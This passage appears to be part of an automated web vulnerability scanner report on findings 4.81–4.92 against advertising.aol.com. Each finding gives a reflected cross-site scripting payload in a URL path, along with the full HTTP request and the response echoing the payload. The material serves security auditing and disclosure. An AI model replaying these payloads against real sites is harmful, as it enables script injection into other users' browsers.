Last-Modified: Sat, 17 Sep 2011 16:48:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4c13a"-alert(1)-"8431ceb2f9d/3/3/1557169105/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.81. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/1557169105/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6be9"><script>alert(1)</script>039211a30df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f6be9"><script>alert(1)</script>039211a30df/3/3/1557169105/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f6be9"><script>alert(1)</script>039211a30df/3/3/1557169105/" />
...[SNIP]...

4.82. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1128450710/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3710"><script>alert(1)</script>7274af88a73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b3710"><script>alert(1)</script>7274af88a73/4/1/1128450710/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b3710"><script>alert(1)</script>7274af88a73/4/1/1128450710/" />
...[SNIP]...

4.83. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1128450710/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f6f"-alert(1)-"bf6f65277d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /12f6f"-alert(1)-"bf6f65277d7/4/1/1128450710/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/12f6f"-alert(1)-"bf6f65277d7/4/1/1128450710/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.84. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/708534695/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7aa06"-alert(1)-"a74428db3c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7aa06"-alert(1)-"a74428db3c9/4/3/708534695/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7aa06"-alert(1)-"a74428db3c9/4/3/708534695/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.85. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/708534695/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bea"><script>alert(1)</script>1ced0c96631 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /69bea"><script>alert(1)</script>1ced0c96631/4/3/708534695/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/69bea"><script>alert(1)</script>1ced0c96631/4/3/708534695/" />
...[SNIP]...

4.86. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/2/1348442932/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27601"><script>alert(1)</script>83001201018 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /27601"><script>alert(1)</script>83001201018/5/2/1348442932/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/27601"><script>alert(1)</script>83001201018/5/2/1348442932/" />
...[SNIP]...

4.87. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/2/1348442932/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27551"-alert(1)-"d17c7163a68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /27551"-alert(1)-"d17c7163a68/5/2/1348442932/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/27551"-alert(1)-"d17c7163a68/5/2/1348442932/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.88. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1649521156/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96a23"-alert(1)-"38b4441aa25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /96a23"-alert(1)-"38b4441aa25/5/3/1649521156/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/96a23"-alert(1)-"38b4441aa25/5/3/1649521156/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.89. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1649521156/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feaf1"><script>alert(1)</script>39e73b78bbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feaf1"><script>alert(1)</script>39e73b78bbb/5/3/1649521156/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/feaf1"><script>alert(1)</script>39e73b78bbb/5/3/1649521156/" />
...[SNIP]...

4.90. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/1581270199/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9154d"-alert(1)-"54a37e32f48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9154d"-alert(1)-"54a37e32f48/6/1/1581270199/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/9154d"-alert(1)-"54a37e32f48/6/1/1581270199/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.91. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/1581270199/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20a6"><script>alert(1)</script>80e754d2ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f20a6"><script>alert(1)</script>80e754d2ae/6/1/1581270199/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f20a6"><script>alert(1)</script>80e754d2ae/6/1/1581270199/" />
...[SNIP]...

4.92. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/882857095/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee14a"><script>alert(1)</script>2c72c6f0042 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ee14a"><script>alert(1)</script>2c72c6f0042/6/3/882857095/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
